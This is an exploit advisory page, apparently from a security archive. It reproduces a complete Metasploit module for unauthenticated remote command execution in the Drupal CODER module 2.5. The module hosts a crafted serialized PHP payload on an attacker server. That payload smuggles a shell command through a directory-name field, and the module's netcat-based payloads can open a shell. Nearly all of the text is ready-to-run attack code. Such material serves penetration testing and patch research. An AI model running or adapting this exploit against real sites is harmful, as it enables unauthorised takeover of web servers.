Drupal CODER Module 2.5 - Remote Command Execution

2016.07.25
Credit: Mehmet Ince
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info={}) super(update_info(info, 'Name' => 'Drupal CODER Module Remote Command Execution', 'Description' => %q{ This module exploits a Remote Command Execution vulnerability in Drupal CODER Module. Unauthenticated users can execute arbitrary command under the context of the web server user. CODER module doesn't sufficiently validate user inputs in a script file that has the php extension. A malicious unauthenticated user can make requests directly to this file to execute arbitrary command. The module does not need to be enabled for this to be exploited This module was tested against CODER 2.5 with Drupal 7.5 installation on Ubuntu server. }, 'License' => MSF_LICENSE, 'Author' => [ 'Nicky Bloor', # discovery 'Mehmet Ince <mehmet@mehmetince.net>' # msf module ], 'References' => [ ['URL', 'https://www.drupal.org/node/2765575'] ], 'Privileged' => false, 'Payload' => { 'Space' => 225, 'DisableNops' => true, 'BadChars' => "\x00\x2f", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'netcat netcat-e' }, }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [ ['Automatic', {}] ], 'DisclosureDate' => 'Jul 13 2016', 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']), OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']), OptPort.new('SRVPORT', [true, 'Bogus web server port to listen']) ] ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'), ) if res && res.code == 200 Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def on_request_uri(cli, _request) print_status("Incoming request detected...") p = '' p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}' p << 's:11:"theme_cache";s:16:"theme_cache_test";' p << 's:9:"variables";s:14:"variables_test";' p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}' p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}' p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";' p << 's:7:"new_dir";s:' p << (payload.encoded.length + 14).to_s p << ':"f --help && ' p << payload.encoded p << ' #";s:4:"name";s:4:"test";}}}' print_status("Sending payload...") send_response(cli, p) end def exploit start_service send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'), 'encode_params' => false, 'vars_get' => { 'file' => get_uri } ) stop_service end end


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top